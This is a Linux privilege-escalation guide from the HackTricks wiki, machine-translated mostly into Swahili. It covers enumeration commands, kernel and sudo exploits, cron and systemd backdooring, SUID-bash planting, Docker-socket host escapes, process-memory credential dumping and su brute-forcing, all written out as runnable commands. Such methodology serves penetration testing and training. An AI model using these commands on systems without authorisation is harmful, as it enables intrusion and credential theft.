Linux Privilege Escalation

PreviousChecklist - Linux Privilege Escalation NextArbitrary File Write to Root

Last updated 6 days ago

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

System Information

OS info

Tuanzishe kwa kupata maarifa kuhusu OS inayotumika

(cat /proc/version || uname -a ) 2>/dev/null
lsb_release -a 2>/dev/null # old, not by default on many systems
cat /etc/os-release 2>/dev/null # universal on modern systems

Path

Ikiwa una idhini za kuandika kwenye folda yoyote ndani ya mabadiliko ya PATH unaweza kuwa na uwezo wa kuiba baadhi ya maktaba au binaries:

echo $PATH

Env info

Habari za kuvutia, nywila au funguo za API katika mabadiliko ya mazingira?

(env || set) 2>/dev/null

Kernel exploits

Angalia toleo la kernel na ikiwa kuna exploit ambayo inaweza kutumika kuongeza mamlaka

cat /proc/version
uname -a
searchsploit "Linux Kernel"

Unaweza kupata orodha nzuri ya kernel zenye udhaifu na baadhi ya compiled exploits tayari hapa: https://github.com/lucyoa/kernel-exploits na exploitdb sploits. Tovuti nyingine ambapo unaweza kupata baadhi ya compiled exploits: https://github.com/bwbwbwbw/linux-exploit-binaries, https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack

Ili kutoa toleo zote za kernel zenye udhaifu kutoka kwenye wavuti hiyo unaweza kufanya:

curl https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md 2>/dev/null | grep "Kernels: " | cut -d ":" -f 2 | cut -d "<" -f 1 | tr -d "," | tr ' ' '\n' | grep -v "^\d\.\d$" | sort -u -r | tr '\n' ' '

Tools that could help to search for kernel exploits are:

linux-exploit-suggester.sh linux-exploit-suggester2.pl linuxprivchecker.py (execute IN victim,only checks exploits for kernel 2.x)

Daima tafuta toleo la kernel kwenye Google, labda toleo lako la kernel limeandikwa katika exploit fulani ya kernel na kisha utakuwa na uhakika kwamba exploit hii ni halali.

CVE-2016-5195 (DirtyCow)

Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8

# make dirtycow stable
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
https://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c

Sudo version

Kulingana na toleo la sudo lililo hatarini ambalo linaonekana katika:

searchsploit sudo

Unaweza kuangalia kama toleo la sudo lina udhaifu kwa kutumia hii grep.

sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\*\|1\.8\.2[01234567]"

sudo < v1.28

Kutoka @sickrov

sudo -u#-1 /bin/bash

Dmesg saini ya uthibitisho imefeli

Angalia smasher2 box ya HTB kwa mfano wa jinsi hii vuln inaweza kutumika

dmesg 2>/dev/null | grep "signature"

Zaidi ya uainishaji wa mfumo

date 2>/dev/null #Date
(df -h || lsblk) #System stats
lscpu #CPU info
lpstat -a 2>/dev/null #Printers info

Orodhesha ulinzi unaowezekana

AppArmor

if [ `which aa-status 2>/dev/null` ]; then
aa-status
elif [ `which apparmor_status 2>/dev/null` ]; then
apparmor_status
elif [ `ls -d /etc/apparmor* 2>/dev/null` ]; then
ls -d /etc/apparmor*
else
echo "Not found AppArmor"
fi

Grsecurity

((uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo "Not found grsecurity")

PaX

(which paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo "Not found PaX")

Execshield

(grep "exec-shield" /etc/sysctl.conf || echo "Not found Execshield")

SElinux

(sestatus 2>/dev/null || echo "Not found sestatus")

ASLR

cat /proc/sys/kernel/randomize_va_space 2>/dev/null
#If 0, not enabled

Docker Breakout

Ikiwa uko ndani ya kontena la docker unaweza kujaribu kutoroka kutoka kwake:

Docker Security

Drives

Angalia kitu ambacho kimewekwa na kisichoweza kuwekwa, wapi na kwa nini. Ikiwa chochote hakijawa kimewekwa unaweza kujaribu kukiweka na kuangalia taarifa za kibinafsi

ls /dev 2>/dev/null | grep -i "sd"
cat /etc/fstab 2>/dev/null | grep -v "^#" | grep -Pv "\W*\#" 2>/dev/null
#Check if credentials in fstab
grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null

Programu muhimu

Taja binaries muhimu

which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null

Pia, angalia kama compiler yeyote imewekwa. Hii ni muhimu ikiwa unahitaji kutumia exploit ya kernel kwani inapendekezwa kuikamilisha katika mashine unayotaka kuitumia (au katika moja inayofanana)

(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/")

Programu Zenye Uthibitisho Zilizowekwa

Angalia toleo la vifurushi na huduma zilizowekwa. Huenda kuna toleo la zamani la Nagios (kwa mfano) ambalo linaweza kutumiwa kwa ajili ya kupandisha mamlaka... Inapendekezwa kuangalia kwa mikono toleo la programu zinazoshuku zaidi zilizowekwa.

dpkg -l #Debian
rpm -qa #Centos

Ikiwa una ufikiaji wa SSH kwa mashine hiyo unaweza pia kutumia openVAS kuangalia programu zilizopitwa na wakati na zenye udhaifu zilizowekwa ndani ya mashine.

Kumbuka kwamba amri hizi zitaonyesha habari nyingi ambazo kwa kawaida zitakuwa hazina maana, kwa hivyo inapendekezwa kutumia programu kama OpenVAS au sawa na hiyo ambayo itakagua ikiwa toleo lolote la programu lililowekwa lina udhaifu kwa mashambulizi yanayojulikana

Mchakato

Angalia michakato gani inatekelezwa na uangalie ikiwa mchakato wowote una privilege zaidi kuliko inavyopaswa (labda tomcat inatekelezwa na root?)

ps aux
ps -ef
top -n 1

Daima angalia kwa electron/cef/chromium debuggers zinazotembea, unaweza kuzitumia kuboresha mamlaka. Linpeas inatambua hizo kwa kuangalia parameter --inspect ndani ya mistari ya amri ya mchakato. Pia angalia mamlaka yako juu ya binaries za michakato, labda unaweza kuandika upya wa mtu mwingine.

Ufuatiliaji wa mchakato

Unaweza kutumia zana kama pspy kufuatilia michakato. Hii inaweza kuwa muhimu sana kutambua michakato dhaifu inayotekelezwa mara kwa mara au wakati seti ya mahitaji inatimizwa.

Kumbukumbu ya mchakato

Huduma zingine za seva huhifadhi vithibitisho katika maandiko wazi ndani ya kumbukumbu. Kwa kawaida utahitaji mamlaka ya root kusoma kumbukumbu ya michakato inayomilikiwa na watumiaji wengine, kwa hivyo hii kawaida huwa na manufaa zaidi unapokuwa tayari root na unataka kugundua vithibitisho zaidi. Hata hivyo, kumbuka kwamba kama mtumiaji wa kawaida unaweza kusoma kumbukumbu ya michakato unayomiliki.

Kumbuka kwamba siku hizi mashine nyingi haziruhusu ptrace kwa default ambayo inamaanisha huwezi kutupa michakato mingine inayomilikiwa na mtumiaji wako asiye na mamlaka.

Faili /proc/sys/kernel/yama/ptrace_scope inasimamia upatikanaji wa ptrace:

kernel.yama.ptrace_scope = 0: michakato yote inaweza kufuatiliwa, mradi tu zina uid sawa. Hii ndiyo njia ya kawaida jinsi ptracing ilivyofanya kazi.
kernel.yama.ptrace_scope = 1: mchakato wa mzazi tu unaweza kufuatiliwa.
kernel.yama.ptrace_scope = 2: Ni admin tu anayeweza kutumia ptrace, kwani inahitaji uwezo wa CAP_SYS_PTRACE.
kernel.yama.ptrace_scope = 3: Hakuna michakato inayoweza kufuatiliwa kwa ptrace. Mara ikipangwa, upya unahitajika ili kuwezesha ptracing tena.

GDB

Ikiwa una ufikiaji wa kumbukumbu ya huduma ya FTP (kwa mfano) unaweza kupata Heap na kutafuta ndani ya vithibitisho vyake.

gdb -p <FTP_PROCESS_PID>
(gdb) info proc mappings
(gdb) q
(gdb) dump memory /tmp/mem_ftp <START_HEAD> <END_HEAD>
(gdb) q
strings /tmp/mem_ftp #User and password

GDB Script

dump-memory.sh

#!/bin/bash
#./dump-memory.sh <PID>
grep rw-p /proc/$1/maps \
| sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' \
| while read start stop; do \
gdb --batch --pid $1 -ex \
"dump memory $1-$start-$stop.dump 0x$start 0x$stop"; \
done

/proc/$pid/maps & /proc/$pid/mem

Kwa kitambulisho cha mchakato kilichotolewa, ramani zinaonyesha jinsi kumbukumbu inavyopangwa ndani ya nafasi ya anwani ya virtual ya mchakato huo; pia inaonyesha idhini za kila eneo lililopangwa. Faili ya mem ya pseudo inaonyesha kumbukumbu ya michakato yenyewe. Kutoka kwenye faili ya ramani tunajua ni zipi sehemu za kumbukumbu zinazoweza kusomwa na ofset zao. Tunatumia taarifa hii kutafuta ndani ya faili ya mem na kutupa maeneo yote yanayoweza kusomwa kwenye faili.

procdump()
(
cat /proc/$1/maps | grep -Fv ".so" | grep " 0 " | awk '{print $1}' | ( IFS="-"
while read a b; do
dd if=/proc/$1/mem bs=$( getconf PAGESIZE ) iflag=skip_bytes,count_bytes \
skip=$(( 0x$a )) count=$(( 0x$b - 0x$a )) of="$1_mem_$a.bin"
done )
cat $1*.bin > $1.dump
rm $1*.bin
)

/dev/mem

/dev/mem inatoa ufikiaji wa kikazi cha mfumo, si kumbukumbu ya virtual. Nafasi ya anwani ya virtual ya kernel inaweza kufikiwa kwa kutumia /dev/kmem. Kwa kawaida, /dev/mem inaweza kusomwa tu na root na kundi la kmem.

strings /dev/mem -n10 | grep -i PASS

ProcDump kwa linux

ProcDump ni upyaishaji wa Linux wa chombo cha jadi cha ProcDump kutoka kwa seti ya zana za Sysinternals kwa Windows. Pata katika https://github.com/Sysinternals/ProcDump-for-Linux

procdump -p 1714

ProcDump v1.2 - Sysinternals process dump utility
Copyright (C) 2020 Microsoft Corporation. All rights reserved. Licensed under the MIT license.
Mark Russinovich, Mario Hewardt, John Salem, Javid Habibi
Monitors a process and writes a dump file when the process meets the
specified criteria.

Process:		sleep (1714)
CPU Threshold:		n/a
Commit Threshold:	n/a
Thread Threshold:		n/a
File descriptor Threshold:		n/a
Signal:		n/a
Polling interval (ms):	1000
Threshold (s):	10
Number of Dumps:	1
Output directory for core dumps:	.

Press Ctrl-C to end monitoring without terminating the process.

[20:20:58 - WARN]: Procdump not running with elevated credentials. If your uid does not match the uid of the target process procdump will not be able to capture memory dumps
[20:20:58 - INFO]: Timed:
[20:21:00 - INFO]: Core dump 0 generated: ./sleep_time_2021-11-03_20:20:58.1714

Tools

Ili kudump kumbukumbu ya mchakato unaweza kutumia:

https://github.com/Sysinternals/ProcDump-for-Linux
https://github.com/hajzer/bash-memory-dump (root) - _Unaweza kuondoa mahitaji ya root kwa mikono na kudump mchakato unaomilikiwa na wewe
Script A.5 kutoka https://www.delaat.net/rp/2016-2017/p97/report.pdf (root inahitajika)

Credentials from Process Memory

Manual example

Ikiwa unapata kwamba mchakato wa uthibitishaji unafanya kazi:

ps -ef | grep "authenticator"
root      2027  2025  0 11:46 ?        00:00:00 authenticator

Unaweza kutupa mchakato (angalia sehemu za awali ili kupata njia tofauti za kutupa kumbukumbu ya mchakato) na kutafuta ithibati ndani ya kumbukumbu:

./dump-memory.sh 2027
strings *.dump | grep -i password

mimipenguin

Chombo https://github.com/huntergregal/mimipenguin kitachukua akili za maandiko wazi kutoka kwenye kumbukumbu na kutoka kwa faili maarufu. Kinahitaji ruhusa za root ili kufanya kazi vizuri.

Kipengele

Jina la Mchakato

Nywila ya GDM (Kali Desktop, Debian Desktop)

gdm-password

Gnome Keyring (Ubuntu Desktop, ArchLinux Desktop)

gnome-keyring-daemon

LightDM (Ubuntu Desktop)

lightdm

VSFTPd (Mawasiliano ya FTP ya Kazi)

vsftpd

Apache2 (Mawasiliano ya HTTP Basic Auth ya Kazi)

apache2

OpenSSH (Mawasiliano ya SSH ya Kazi - Matumizi ya Sudo)

sshd:

Search Regexes/truffleproc

# un truffleproc.sh against your current Bash shell (e.g. $$)
./truffleproc.sh $$
# coredumping pid 6174
Reading symbols from od...
Reading symbols from /usr/lib/systemd/systemd...
Reading symbols from /lib/systemd/libsystemd-shared-247.so...
Reading symbols from /lib/x86_64-linux-gnu/librt.so.1...
[...]
# extracting strings to /tmp/tmp.o6HV0Pl3fe
# finding secrets
# results in /tmp/tmp.o6HV0Pl3fe/results.txt

Scheduled/Cron jobs

Angalia kama kazi yoyote iliyopangwa ina udhaifu. Labda unaweza kunufaika na script inayotekelezwa na root (udhaifu wa wildcard? inaweza kubadilisha faili ambazo root inatumia? tumia symlinks? tengeneza faili maalum katika directory ambayo root inatumia?).

crontab -l
ls -al /etc/cron* /etc/at*
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"

Cron path

Kwa mfano, ndani ya /etc/crontab unaweza kupata PATH: PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

(Kumbuka jinsi mtumiaji "user" ana ruhusa za kuandika juu ya /home/user)

Ikiwa ndani ya crontab hii mtumiaji wa root anajaribu kutekeleza amri au script bila kuweka njia. Kwa mfano: * * * * root overwrite.sh Basi, unaweza kupata shell ya root kwa kutumia:

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
#Wait cron job to be executed
/tmp/bash -p #The effective uid and gid to be set to the real uid and gid

Cron kutumia script yenye wildcard (Wildcard Injection)

Ikiwa script inayotekelezwa na root ina “*” ndani ya amri, unaweza kuitumia hii kufanya mambo yasiyotarajiwa (kama privesc). Mfano:

rsync -a *.sh rsync://host.back/src/rbd #You can create a file called "-e sh myscript.sh" so the script will execute our script

Ikiwa wildcard imeandamana na njia kama /some/path/* , haiko hatarini (hata ./* haina hatari).

Soma ukurasa ufuatao kwa mbinu zaidi za unyakuzi wa wildcard:

Wildcards Spare tricks

Kuandika tena skripti ya Cron na symlink

Ikiwa unaweza kubadilisha skripti ya cron inayotekelezwa na root, unaweza kupata shell kwa urahisi:

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > </PATH/CRON/SCRIPT>
#Wait until it is executed
/tmp/bash -p

Ikiwa skripti inayotekelezwa na root inatumia kadiria ambapo una ufaccess kamili, huenda ikawa na manufaa kufuta folda hiyo na kuunda folda ya symlink kwa folda nyingine inayohudumia skripti inayodhibitiwa na wewe

ln -d -s </PATH/TO/POINT> </PATH/CREATE/FOLDER>

Kazi za cron za mara kwa mara

Unaweza kufuatilia michakato ili kutafuta michakato inayotekelezwa kila dakika 1, 2 au 5. Huenda unaweza kunufaika na hilo na kupandisha mamlaka.

Kwa mfano, ili kufuatilia kila 0.1s kwa dakika 1, panga kwa amri zilizotekelezwa kidogo na uondoe amri ambazo zimekuwa zikitekelezwa zaidi, unaweza kufanya:

for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; done; sort /tmp/monprocs.tmp | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort | grep -E -v "\s*[6-9][0-9][0-9]|\s*[0-9][0-9][0-9][0-9]"; rm /tmp/monprocs.tmp;

Unaweza pia kutumia pspy (hii itasimamia na kuorodhesha kila mchakato unaoanza).

Kazi za cron zisizoonekana

Inawezekana kuunda kazi ya cron kwa kuweka kurudi kwa gari baada ya maoni (bila tabia ya newline), na kazi ya cron itafanya kazi. Mfano (angalia tabia ya kurudi kwa gari):

#This is a comment inside a cron config file\r* * * * * echo "Surprise!"

Services

Writable .service files

Angalia kama unaweza kuandika faili yoyote ya .service, ikiwa unaweza, unaweza kurekebisha ili itekeleze backdoor yako wakati huduma inapo anzishwa, kurejeshwa au kusitishwa (labda utahitaji kusubiri hadi mashine ireboot). Kwa mfano, tengeneza backdoor yako ndani ya faili ya .service na ExecStart=/tmp/script.sh

Writable service binaries

Kumbuka kwamba ikiwa una idhini za kuandika juu ya binaries zinazotekelezwa na huduma, unaweza kuzibadilisha kwa backdoors ili wakati huduma hizo zitakapotekelezwa tena, backdoors zitatekelezwa.

systemd PATH - Relative Paths

Unaweza kuona PATH inayotumika na systemd na:

systemctl show-environment

Ikiwa unapata kwamba unaweza kuandika katika yoyote ya folda za njia hiyo unaweza kuwa na uwezo wa kuinua mamlaka. Unahitaji kutafuta njia za uhusiano zinazotumika kwenye faili za usanidi wa huduma kama:

ExecStart=faraday-server
ExecStart=/bin/sh -ec 'ifup --allow=hotplug %I; ifquery --state %I'
ExecStop=/bin/sh "uptux-vuln-bin3 -stuff -hello"

Kisha, tengeneza executable yenye jina sawa na binary ya njia relative ndani ya folda ya systemd PATH ambayo unaweza kuandika, na wakati huduma inapoombwa kutekeleza kitendo kilichohatarishwa (Start, Stop, Reload), backdoor yako itatekelezwa (watumiaji wasio na haki mara nyingi hawawezi kuanzisha/kusitisha huduma lakini angalia kama unaweza kutumia sudo -l).

Jifunze zaidi kuhusu huduma kwa kutumia man systemd.service.

Timers

Timers ni faili za kitengo cha systemd ambazo jina lake linamalizika kwa **.timer** ambazo zinadhibiti faili za **.service** au matukio. Timers zinaweza kutumika kama mbadala wa cron kwani zina msaada wa ndani kwa matukio ya wakati wa kalenda na matukio ya wakati wa monotonic na zinaweza kuendeshwa kwa njia isiyo ya sambamba.

Unaweza kuorodhesha timers zote kwa:

systemctl list-timers --all

Writable timers

Ikiwa unaweza kubadilisha timer unaweza kufanya itekeleze baadhi ya matukio ya systemd.unit (kama .service au .target)

Unit=backdoor.service

Katika hati unaweza kusoma ni nini Unit:

Kitengo cha kuamsha wakati kipima muda hiki kinapokamilika. Hoja ni jina la kitengo, ambacho kiambishi chake si ".timer". Ikiwa hakijasemwa, thamani hii inarudi kwa huduma ambayo ina jina sawa na kitengo cha kipima muda, isipokuwa kwa kiambishi. (Tazama hapo juu.) Inapendekezwa kwamba jina la kitengo linaloamshwa na jina la kitengo cha kipima muda liwe sawa, isipokuwa kwa kiambishi.

Kwa hivyo, ili kutumia ruhusa hii unahitaji:

Kupata kitengo fulani cha systemd (kama .service) ambacho kina kikimbia binary inayoweza kuandikwa
Kupata kitengo fulani cha systemd ambacho kina kikimbia njia ya uhusiano na una ruhusa za kuandika juu ya PATH ya systemd (ili kujifanya kuwa executable hiyo)

Jifunze zaidi kuhusu vipima muda na man systemd.timer.

Kuwezesha Kipima Muda

Ili kuwezesha kipima muda unahitaji ruhusa za mzizi na kutekeleza:

sudo systemctl enable backu2.timer
Created symlink /etc/systemd/system/multi-user.target.wants/backu2.timer → /lib/systemd/system/backu2.timer.

Note the timer is activated by creating a symlink to it on /etc/systemd/system/<WantedBy_section>.wants/<name>.timer

Sockets

Unix Domain Sockets (UDS) enable process communication on the same or different machines within client-server models. They utilize standard Unix descriptor files for inter-computer communication and are set up through .socket files.

Sockets can be configured using .socket files.

Learn more about sockets with man systemd.socket. Inside this file, several interesting parameters can be configured:

ListenStream, ListenDatagram, ListenSequentialPacket, ListenFIFO, ListenSpecial, ListenNetlink, ListenMessageQueue, ListenUSBFunction: Hizi chaguo ni tofauti lakini muhtasari unatumiwa ku onyesha wapi itasikiliza kwenye socket (njia ya faili la socket la AF_UNIX, IPv4/6 na/au nambari ya bandari ya kusikiliza, nk.)
Accept: Inachukua hoja ya boolean. Ikiwa kweli, kituo cha huduma kinazaliwa kwa kila muunganisho unaokuja na socket ya muunganisho pekee inapitishwa kwake. Ikiwa false, sockets zote zinazolisikiliza zenyewe zinapitishwa kwa kitengo cha huduma kilichozinduliwa, na kitengo kimoja cha huduma kinazaliwa kwa muunganisho wote. Thamani hii inapuuziliwa mbali kwa sockets za datagram na FIFOs ambapo kitengo kimoja cha huduma kinashughulikia bila masharti trafiki yote inayokuja. Inarudiwa kuwa false. Kwa sababu za utendaji, inapendekezwa kuandika daemons mpya tu kwa njia inayofaa kwa Accept=no.
ExecStartPre, ExecStartPost: Inachukua mistari moja au zaidi ya amri, ambazo zina tekelezwa kabla au baada ya sockets/FIFOs zinazolisikiliza ku undwa na kuunganishwa, mtawalia. Neno la kwanza la mstari wa amri lazima liwe jina la faili la moja kwa moja, kisha kufuatwa na hoja za mchakato.
ExecStopPre, ExecStopPost: Amri za ziada ambazo zina tekelezwa kabla au baada ya sockets/FIFOs zinazolisikiliza ku fungwa na kuondolewa, mtawalia.
Service: Inabainisha jina la kitengo cha huduma kuanzisha kwenye trafiki inayokuja. Mpangilio huu unaruhusiwa tu kwa sockets zenye Accept=no. Inarudi kwa huduma ambayo ina jina sawa na socket (ikiwa na kiambishi kilichobadilishwa). Katika hali nyingi, haitakuwa lazima kutumia chaguo hili.

Writable .socket files

If you find a writable .socket file you can add at the beginning of the [Socket] section something like: ExecStartPre=/home/kali/sys/backdoor and the backdoor will be executed before the socket is created. Therefore, you will probably need to wait until the machine is rebooted. &#xNAN;Note that the system must be using that socket file configuration or the backdoor won't be executed

Writable sockets

If you identify any writable socket (now we are talking about Unix Sockets and not about the config .socket files), then you can communicate with that socket and maybe exploit a vulnerability.

Enumerate Unix Sockets

netstat -a -p --unix

Muunganisho wa moja kwa moja

#apt-get install netcat-openbsd
nc -U /tmp/socket  #Connect to UNIX-domain stream socket
nc -uU /tmp/socket #Connect to UNIX-domain datagram socket

#apt-get install socat
socat - UNIX-CLIENT:/dev/socket #connect to UNIX-domain socket, irrespective of its type

Mfano wa unyakuzi:

Socket Command Injection

HTTP sockets

Kumbuka kwamba kunaweza kuwa na sockets zinazotafakari maombi ya HTTP (Sizungumzii kuhusu faili za .socket bali faili zinazofanya kazi kama sockets za unix). Unaweza kuangalia hii kwa:

curl --max-time 2 --unix-socket /pat/to/socket/files http:/index

Ikiwa socket inas respond na HTTP ombi, basi unaweza kuwasiliana nayo na labda kutumia udhaifu fulani.

Socket ya Docker Inayoweza Kuandikwa

Socket ya Docker, mara nyingi hupatikana kwenye /var/run/docker.sock, ni faili muhimu ambayo inapaswa kulindwa. Kwa kawaida, inaweza kuandikwa na mtumiaji root na wanachama wa kundi la docker. Kuwa na ufikiaji wa kuandika kwenye socket hii kunaweza kusababisha kupanda hadhi. Hapa kuna muhtasari wa jinsi hii inaweza kufanywa na mbinu mbadala ikiwa Docker CLI haipatikani.

Kupanda Hadhi kwa kutumia Docker CLI

Ikiwa una ufikiaji wa kuandika kwenye socket ya Docker, unaweza kupanda hadhi kwa kutumia amri zifuatazo:

docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh

These commands allow you to run a container with root-level access to the host's file system.

Using Docker API Directly

In cases where the Docker CLI isn't available, the Docker socket can still be manipulated using the Docker API and curl commands.

List Docker Images: Retrieve the list of available images.

curl -XGET --unix-socket /var/run/docker.sock http://localhost/images/json

Create a Container: Send a request to create a container that mounts the host system's root directory.

curl -XPOST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock -d '{"Image":"<ImageID>","Cmd":["/bin/sh"],"DetachKeys":"Ctrl-p,Ctrl-q","OpenStdin":true,"Mounts":[{"Type":"bind","Source":"/","Target":"/host_root"}]}' http://localhost/containers/create

Start the newly created container:

curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/<NewContainerID>/start

Attach to the Container: Use socat to establish a connection to the container, enabling command execution within it.

socat - UNIX-CONNECT:/var/run/docker.sock
POST /containers/<NewContainerID>/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
Host:
Connection: Upgrade
Upgrade: tcp

After setting up the socat connection, you can execute commands directly in the container with root-level access to the host's filesystem.

Others

Note that if you have write permissions over the docker socket because you are inside the group docker you have more ways to escalate privileges. If the docker API is listening in a port you can also be able to compromise it.

Check more ways to break out from docker or abuse it to escalate privileges in:

Docker Security

Containerd (ctr) privilege escalation

If you find that you can use the ctr command read the following page as you may be able to abuse it to escalate privileges:

Containerd (ctr) Privilege Escalation

RunC privilege escalation

If you find that you can use the runc command read the following page as you may be able to abuse it to escalate privileges:

RunC Privilege Escalation

D-Bus

D-Bus ni mfumo wa mawasiliano kati ya michakato (IPC) ambao unaruhusu programu kuingiliana kwa ufanisi na kushiriki data. Imeundwa kwa kuzingatia mfumo wa kisasa wa Linux, inatoa mfumo thabiti wa mawasiliano ya aina mbalimbali za programu.

Mfumo huu ni wa kubadilika, ukisaidia IPC ya msingi inayoboresha ubadilishanaji wa data kati ya michakato, ikikumbusha sockets za eneo la UNIX zilizoboreshwa. Aidha, inasaidia kutangaza matukio au ishara, ikikuza uunganisho usio na mshono kati ya vipengele vya mfumo. Kwa mfano, ishara kutoka kwa daemon ya Bluetooth kuhusu simu inayokuja inaweza kumfanya mpiga muziki akate sauti, kuboresha uzoefu wa mtumiaji. Zaidi ya hayo, D-Bus inasaidia mfumo wa vitu vya mbali, ikirahisisha maombi ya huduma na wito wa mbinu kati ya programu, ikipunguza michakato ambayo hapo awali ilikuwa ngumu.

D-Bus inafanya kazi kwa mfumo wa ruhusa/kuzuia, ikisimamia ruhusa za ujumbe (wito wa mbinu, utoaji wa ishara, n.k.) kulingana na athari ya jumla ya sheria za sera zinazolingana. Sera hizi zinaelezea mwingiliano na basi, na inaweza kuruhusu kupandisha mamlaka kupitia matumizi mabaya ya ruhusa hizi.

Mfano wa sera kama hiyo katika /etc/dbus-1/system.d/wpa_supplicant.conf unapatikana, ukielezea ruhusa za mtumiaji wa root kumiliki, kutuma, na kupokea ujumbe kutoka fi.w1.wpa_supplicant1.

Sera bila mtumiaji au kundi lililotajwa zinatumika kwa ujumla, wakati sera za muktadha "default" zinatumika kwa wote ambao hawajafunikwa na sera nyingine maalum.

<policy user="root">
<allow own="fi.w1.wpa_supplicant1"/>
<allow send_destination="fi.w1.wpa_supplicant1"/>
<allow send_interface="fi.w1.wpa_supplicant1"/>
<allow receive_sender="fi.w1.wpa_supplicant1" receive_type="signal"/>
</policy>

Jifunze jinsi ya kuhesabu na kutumia mawasiliano ya D-Bus hapa:

D-Bus Enumeration & Command Injection Privilege Escalation

Mtandao

Daima ni ya kuvutia kuhesabu mtandao na kubaini nafasi ya mashine.

Hesabu ya jumla

#Hostname, hosts and DNS
cat /etc/hostname /etc/hosts /etc/resolv.conf
dnsdomainname

#Content of /etc/inetd.conf & /etc/xinetd.conf
cat /etc/inetd.conf /etc/xinetd.conf

#Interfaces
cat /etc/networks
(ifconfig || ip a)

#Neighbours
(arp -e || arp -a)
(route || ip n)

#Iptables rules
(timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Pv "\W*\#" 2>/dev/null)

#Files used by network services
lsof -i

Open ports

Daima angalia huduma za mtandao zinazofanya kazi kwenye mashine ambayo hukuweza kuingiliana nayo kabla ya kuifikia:

(netstat -punta || ss --ntpu)
(netstat -punta || ss --ntpu) | grep "127.0"

Sniffing

Angalia kama unaweza kunusa trafiki. Ikiwa unaweza, unaweza kuwa na uwezo wa kupata baadhi ya akidi.

timeout 1 tcpdump

Users

Generic Enumeration

Angalia nani ulivyo, ni mamlaka gani unayo, ni watumiaji gani wako kwenye mifumo, ni zipi zinaweza kuingia na zipi zina mamlaka ya root:

#Info about me
id || (whoami && groups) 2>/dev/null
#List all users
cat /etc/passwd | cut -d: -f1
#List users with console
cat /etc/passwd | grep "sh$"
#List superusers
awk -F: '($3 == "0") {print}' /etc/passwd
#Currently logged users
w
#Login history
last | tail
#Last log of each user
lastlog

#List all users and their groups
for i in $(cut -d":" -f1 /etc/passwd 2>/dev/null);do id $i;done 2>/dev/null | sort
#Current user PGP keys
gpg --list-keys 2>/dev/null

Big UID

Baadhi ya toleo za Linux zilipata hitilafu inayowaruhusu watumiaji wenye UID > INT_MAX kupandisha hadhi. Maelezo zaidi: hapa, hapa na hapa. Tumia kwa: systemd-run -t /bin/bash

Groups

Angalia kama wewe ni mwanachama wa kundi lolote ambalo linaweza kukupa haki za root:

Interesting Groups - Linux Privesc

Clipboard

Angalia kama kuna kitu chochote cha kuvutia kilichopo ndani ya clipboard (ikiwa inawezekana)

if [ `which xclip 2>/dev/null` ]; then
echo "Clipboard: "`xclip -o -selection clipboard 2>/dev/null`
echo "Highlighted text: "`xclip -o 2>/dev/null`
elif [ `which xsel 2>/dev/null` ]; then
echo "Clipboard: "`xsel -ob 2>/dev/null`
echo "Highlighted text: "`xsel -o 2>/dev/null`
else echo "Not found xsel and xclip"
fi

Sera ya Nywila

grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs

Known passwords

Ikiwa unajua nenosiri lolote la mazingira jaribu kuingia kama kila mtumiaji ukitumia nenosiri hilo.

Su Brute

Ikiwa hujali kufanya kelele nyingi na su na timeout binaries zipo kwenye kompyuta, unaweza kujaribu kuingilia mtumiaji kwa kutumia su-bruteforce. Linpeas kwa kutumia parameter -a pia hujaribu kuingilia watumiaji.

Writable PATH abuses

$PATH

Ikiwa unapata kwamba unaweza kuandika ndani ya folda fulani ya $PATH unaweza kuwa na uwezo wa kupandisha mamlaka kwa kuunda backdoor ndani ya folda inayoweza kuandikwa kwa jina la amri fulani ambayo itatekelezwa na mtumiaji tofauti (root kwa njia bora) na ambayo haitapakiwa kutoka folda ambayo iko kabla ya folda yako inayoweza kuandikwa katika $PATH.

SUDO and SUID

